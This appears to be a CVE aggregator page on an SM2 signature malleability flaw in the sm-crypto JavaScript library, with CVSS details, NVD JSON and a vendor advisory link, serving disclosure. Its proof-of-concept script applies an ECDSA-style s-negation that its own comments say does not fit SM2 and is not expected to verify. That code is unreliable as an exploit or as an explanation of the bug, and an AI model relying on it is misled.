Security Vulnerability Report
CVE-2026-23967 CVSS 7.5 HIGH

CVE-2026-23967

Published: 2026-01-22 03:15:47
Last Modified: 2026-02-25 15:31:26

Description

sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A signature malleability vulnerability exists in the SM2 signature verification logic of the sm-crypto library prior to version 0.3.14: an attacker who holds a valid signature over a message can derive a second, different signature that the library also accepts for that message, without knowing the private key. This does not let the attacker sign new messages; it breaks any design that treats the signature bytes as unique (deduplication or replay detection keyed on the signature, signature-derived identifiers), which is consistent with the CVSS vector scoring integrity impact only and with the assigned weakness CWE-347 (Improper Verification of Cryptographic Signature). Version 0.3.14 patches the issue.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:juneandgreen:sm-crypto:*:*:*:*:*:*:*:* - VULNERABLE
sm-crypto < 0.3.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-23967 Signature Malleability PoC
// Affected: sm-crypto < 0.3.14
// Requires: npm install sm-crypto (an affected version, to reproduce)
const { sm2 } = require('sm-crypto');

// Order n of the SM2 recommended curve (GB/T 32918.5-2017). The earlier draft of this
// PoC asked the `elliptic` package for a curve named 'sm2', which elliptic does not ship.
const n = BigInt('0xFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123');

// sm-crypto signatures are hex strings r || s, 64 hex digits each.
function splitSignature(sigHex) {
  return { r: sigHex.slice(0, 64), s: sigHex.slice(64) };
}

function joinSignature({ r, s }) {
  return r + s;
}

function exploitSignatureMalleability(originalSignature) {
  // Transform from the original PoC: s' = n - s. Caveat: this is the ECDSA negation
  // trick. SM2 verifies with t = (r + s) mod n and [s]G + [t]P_A, which is not
  // symmetric under s -> n - s, so this value is not expected to verify on any
  // version. The vendor advisory under References is the authoritative description.
  const sBig = BigInt('0x' + originalSignature.s);
  const sPrime = (n - sBig).toString(16).padStart(64, '0');
  const malleatedSignature = { r: originalSignature.r, s: sPrime };
  console.log('Original Signature:', originalSignature);
  console.log('Malleated Signature:', malleatedSignature);
  return malleatedSignature;
}

// Verify both signatures against the same message and public key and report the result
// instead of asserting it.
function verifyBothSignatures(message, publicKey, original, malleated) {
  const v1 = sm2.doVerifySignature(message, joinSignature(original), publicKey, { hash: true });
  const v2 = sm2.doVerifySignature(message, joinSignature(malleated), publicKey, { hash: true });
  console.log('Original verifies:', v1);
  console.log('Malleated verifies:', v2);
  return v1 && v2;
}

// Demo with a freshly generated key pair (the earlier draft used placeholder hex values
// and never called the verification step).
const { publicKey, privateKey } = sm2.generateKeyPairHex();
const message = 'test message';
const original = splitSignature(sm2.doSignature(message, privateKey, { hash: true }));
const malleated = exploitSignatureMalleability(original);
verifyBothSignatures(message, publicKey, original, malleated);

References

https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-qv7w-v773-3xqm (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23967",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-22T03:15:47.167",
    "lastModified": "2026-02-25T15:31:26.013",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "sm-crypto provides JavaScript implementations of the Chinese cryptographic algorithms SM2, SM3, and SM4. A signature malleability vulnerability exists in the SM2 signature verification logic of the sm-crypto library prior to version 0.3.14. An attacker can derive a new valid signature for a previously signed message from an existing signature. Version 0.3.14 patches the issue."
      },
      {
        "lang": "es",
        "value": "sm-crypto proporciona implementaciones de JavaScript de los algoritmos criptográficos chinos SM2, SM3 y SM4. Existe una vulnerabilidad de maleabilidad de firma en la lógica de verificación de firma SM2 de la librería sm-crypto anterior a la versión 0.3.14. Un atacante puede derivar una nueva firma válida para un mensaje previamente firmado a partir de una firma existente. La versión 0.3.14 corrige el problema."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-347"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:juneandgreen:sm-crypto:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "0.3.14",
                "matchCriteriaId": "902F9DFD-B5BC-4BF4-9AF2-CB42F616B3D4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/JuneAndGreen/sm-crypto/security/advisories/GHSA-qv7w-v773-3xqm",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}